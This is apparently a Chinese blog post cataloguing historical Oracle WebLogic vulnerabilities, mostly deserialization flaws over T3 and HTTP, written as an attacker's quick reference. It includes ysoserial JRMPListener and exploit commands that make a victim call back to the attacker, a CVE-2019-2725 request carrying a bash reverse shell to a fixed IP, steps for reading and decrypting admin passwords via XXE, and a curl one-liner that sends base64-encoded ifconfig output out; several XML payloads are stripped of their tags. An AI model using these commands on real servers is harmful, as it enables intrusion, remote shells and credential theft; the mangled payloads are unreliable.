Weblogic历史漏洞整理

没有过多涉及原理和分析，只是作为记录，免得一问三不知。

T3协议

• 什么是RMI：远程方法调用(Remote Method Invocation)。能够让在某个java虚拟机上的对象像调用本地对象一样调用另一个java 虚拟机中的对象上的方法。
• Java远程消息交换协议 JRMP 即Java Remote MessagingProtocol，是特定于Java技术的、用于查找和引用远程对象的协议。这是运行在Java远程方法调用RMI之下、TCP/IP之上的线路层协议。，也可以使用CORBA兼容的方法实现。详细介绍请参考：https://blog.csdn.net/cdl2008sky/article/details/6844719

T3协议是用于Weblogic服务器和其他Java Application之间传输信息的协议，是实现上述RMI远程过程调用的专有协议，其允许客户端进行JNDI调用。

当Weblogic发起一个T3协议连接的时候，Weblogic会连接每一个Java虚拟机并传输流量，由于通信过程得到了极大的简化，所以使得其在操作系统资源利用上实现的高效以及最大化，同时提高了传输速度。

CVE-2015-4852

此漏洞主要是由于apache的标准库中Apache Commons Collections基础库的TransformedMap类中。根据@breenmachine的文章，他当时找漏洞的方法是，对weblogic在7001端口的T3 协议进行抓包，发现流量中有java反序列化之后Magic(幻数)ac ed 00 05，然后替换掉对应的部分。

利用方式等同下面的CVE-2016-3510，只不过payload不一样。

CVE-2016-0638

此漏洞是基于CVE-2015-4852漏洞进行黑名单的绕过，CVE-2015-4852补丁主要应用在三个位置上：

• weblogic.rjvm.InboundMsgAbbrev.class :: ServerChannelInputStream
• weblogic.rjvm.MsgAbbrevInputStream.class
• weblogic.iiop.Utils.class

所以如果能找到可以在其readObject中创建自己的InputStream的对象，并且不是使用黑名单中的ServerChannelInputStream和MsgAbbrevInputStream的readExternal进行的反序列化，最后调用readObject()方法进行反序列化的数据的读取，这样就可以执行含有恶意代码的序列化代码。依据这个思路找到了weblogic.jms.common.StreamMessageImpl类，其中的readExternal()方法也符合攻击的需求。

利用方式等同下面的CVE-2016-3510，只不过payload不一样。

CVE-2016-3510

此漏洞是与CVE-2016-0638漏洞利用方式相似，只是选择了weblogic.corba.utils.MarshalledObject进行绕过，绕过之前的CVE-2015-4852和CVE-2016-0638漏洞的修复补丁。
利用方式参照 https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/CVE%20Exploits/WebLogic%20CVE-2016-3510.py

CVE-2017-3248

Apache Commons Collections基础的漏洞已经进行修补，所以CVE-2017-3248漏洞利用方法与之前三个漏洞不同，这次主要是利用了JRMP java远程方法协议。
利用java.rmi.registry.Registry，序列化RemoteObjectInvocationHandler，并使用UnicastRef和远端建立tcp连接，获取RMI registry，最终将加载的内容利用readObject()进行解析，导致之前序列化的恶意代码执行。
利用方式可以参照 https://github.com/quentinhardy/scriptsAndExploits
或者下面

CVE-2018-2628

CVE-2018-2628漏洞与CVE-2017-3248漏洞利用方法类似，仅仅更换了使用的rmi接口，用java.rmi.activation.Activator替换了CVE-2017-3248所使用的java.rmi.registry.Registry，从而绕过resolveProxyClass的判断，成功绕过了CVE-2017-3248漏洞的修复补丁。

vulhub演示地址

java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener [listen port] CommonsCollections1 [command]

其中，[command]即为想执行的命令，而[listen port]是JRMP Server监听的端口。

python exploit.py [victim ip] [victim port] [path to ysoserial] [JRMPListener ip] [JRMPListener port] [JRMPClient]

[JRMPClient]：有JRMPClient或JRMPClient2两个选项，两者只有接口类名的差别。
然后weblogic就会回连到攻击者JRMPListener ip，执行[command]

CVE-2018-2893

CVE-2018-2893漏洞绕过方式是利用StreamMessageImpl对ysoserial工具中的JRMPClient生成的payloadObject进行封装。相当于使用CVE-2016-0638的利用方式加上CVE-2017-3248的 payload 来绕过补丁。
利用方式可参考
https://github.com/vulhub/vulhub/tree/master/weblogic/CVE-2018-2628

CVE-2018-3191

没看到具体介绍，只知道也是T3协议的锅。
这里下载payload生成，https://github.com/voidfyoo/CVE-2018-3191/releases
weblogic-spring-jndi-12.2.1.3.jar for weblogic:

• 12.2.1.3

weblogic-spring-jndi-10.3.6.0.jar for weblogic:

• 10.3.6.0
• 12.2.1.0
• 12.1.3.0
• 12.2.1.1

先生成一个payload，触发weblogic回连。
java -jar weblogic-spring-jndi-10.3.6.0.jar rmi://攻击机ip:端口/exp > payload
攻击者IP开启rmi服务
java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener 端口 CommonsCollections1 "要执行的指令"
然后用weblogic.py向weblogic发起请求
python weblogic.py 172.20.0.2 7001 payload
weblogic就会回连到攻击者IP，然后执行[command]

CVE-2018-3197

没找到介绍

CVE-2018-3201

没找到介绍

CVE-2018-3245

是补来补去一直没有修好的Weblogic JRMP反序列化漏洞。只要满足继承java.rmi.server.RemoteObject,且不在黑名单之中的类对象。 这里通过ReferenceWrapper_Stub这个类对象绕过。
POC生成可以参考 https://github.com/pyn3rd/CVE-2018-3245
利用方式等同 CVE-2018-3191

CVE-2018-3252

基于HTTP协议，DeploymentService组件存在反序列化漏洞，需要登陆后才能使用。
POC生成可以参考 https://github.com/b1ueb0y/CVE-2018-3252

HTTP协议

CVE-2017-3506

此漏洞主要是由于wls组件使用了webservice来处理soap请求，在weblogic.wsee.jaxws.workcontext.WorkContextServerTube.processRequest方法中，当localHeader1和localHeader2都不为null时，将会把所包含的数据传入weblogic.wsee.jaxws.workcontext.WorkContextTube.readHeaderOld方法，在此方法中，对WorkContextXmlInputAdapter类进行了实例化，并调用WorkContextXmlInputAdapter类的构造方法，通过XMLDecoder()进行反序列化操作。
可利用路径如下

/wls-wsat/CoordinatorPortType
/wls-wsat/RegistrationPortTypeRPC
/wls-wsat/ParticipantPortType
/wls-wsat/RegistrationRequesterPortType
/wls-wsat/CoordinatorPortType11
/wls-wsat/RegistrationPortTypeRPC11
/wls-wsat/ParticipantPortType11
/wls-wsat/RegistrationRequesterPortType11

下面的POC等同于执行命令/bin/bash -c "touch /tmp/123"

  
    
        
          
            
              
                /bin/bash
              
              
                -c
              
              
                touch /tmp/123
              
            
          
        
      
    
  

CVE-2017-10271 Weblogic < 10.3.6 'wls-wsat' XMLDecoder 反序列化漏洞

CVE-2017-10271是对CVE-2017-3506修复补丁的一次绕过，可以看到唯一的变化就是把之前的Object标签变成了void标签。

可用来写shell的默认路径，都是servers/AdminServer/tmp/开头

• bea_wls9_async_response
• _WL_internal/bea_wls_internal/9j4dqk/war/
• uddiexplorer
• _WL_internal/wls-wast

访问http://your-ip:7001/bea_wls_internal/test.jsp

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Content-Type: text/xml

    
    
    
    
    
    
    

除此之外，网上还出现了一些变形的payload，大家发现可以直接利用new和method元素完成payload的构造，连void元素都不用了，所以payload还可以这样写：

    
        calc
        
    

CVE-2019-2725 wls9-async 反序列化漏洞

POST /_async/AsyncResponseService HTTP/1.1
Host: 172.xxx:7001
Content-Length: 789
Accept-Encoding: gzip, deflate
SOAPAction: 
Accept: */*
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: keep-alive
content-type: text/xml
 

    
        xx
        xx
        
            
                
                    
                        /bin/bash
                    
                    
                        -c
                    
                    
                        bash -i >& /dev/tcp/192.168.209.1/1234 0>&1
                    
                
                
        
    
    
        
    

可以看到这回是利用class标签构造类，但是由于限制了method从而无法调用函数，因此，找了几个可以通过构造函数进行反序列化的类。网上通用的有

• FileSystemXmlApplicationContext
• UnitOfWorkChangeSet

利用方式可参考 https://github.com/lufeirider/CVE-2019-2725

其余漏洞

• XXE https://paper.seebug.org/906/

可以利用XXE读取base_domain中的名为SerializedSystemIni.dat的密钥和config.xml密文，用weblogic_decrypt.jar解密weblogic的登陆密码。
11g的密文在
安装目录/user_projects/domains/base_domain/servers/AdminServer/security/boot.properties
密钥在安装目录/user_projects/domains/base_domain/security/SerializedSystemIni.dat
10的密文在
安装目录/samples/domains/wl_server/security/boot.properties

• 任意文件上传(CVE-2018-2894)，需要登陆，参考：
  • https://www.cnblogs.com/bmjoker/p/9825497.html
  • https://github.com/vulhub/vulhub/tree/master/weblogic/CVE-2018-2894

SSRF 略

关于命令回显

在linux中，被反引号包裹的字符串会被解释为命令行

echo `whoami` test
root test

windows下执行set可以看到一堆系统变量，用%号可以调用这些变量

echo %COMPUTERNAME%
你的计算机名

命令注入：利用管道符来注入要执行的命令

命令符(linux/win)	作用
;/&	多个命令顺序执行，无逻辑关系
&&	逻辑与，命令1正确执行后，才会执行命令2
||	逻辑或，命令1不正确执行后，才会执行命令2

还有个|，如127.0.0.1|whoami，回显的是whoami的结果
利用Ping命令和dnslog结合获取回显结果

C:\Windows\System32\cmd.exe /c "ping -n 3 test.com || ping -c 3 test.com"
/bin/bash -c "ping -n 3 test.com || ping -c 3 test.com"

目测每个目标要执行两次POC
另外linux还可以通过curl命令来回显

curl test.com/`ifconfig|base64|tr '\n' '-'`

漏洞检测脚本

只是检测是否存在漏洞而已
https://github.com/rabbitmask/WeblogicR2
https://github.com/aloswoya/weblogic [较为全面]
https://github.com/hanc00l/weblogic_unserialize_exploit

参考：
https://www.4hou.com/vulnerable/12874.html
https://icematcha.win/?p=1174
https://www.kingkk.com/2019/05/Weblogic-XMLDecoder%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%AD%A6%E4%B9%A0/
https://mp.weixin.qq.com/s/ebKHjpbQcszAy_vPocW0Sg
weblogic反序列化漏洞分析与调试
https://blog.csdn.net/qq_27446553/article/details/78952010
https://github.com/bit4woo/code2sec.com/blob/master/weblogic%E6%BC%8F%E6%B4%9ECVE-2017-3506%E5%A4%8D%E7%8E%B0%EF%BC%9AWeb%20Services%E6%A8%A1%E5%9D%97%E7%9A%84%E6%BC%8F%E6%B4%9E.md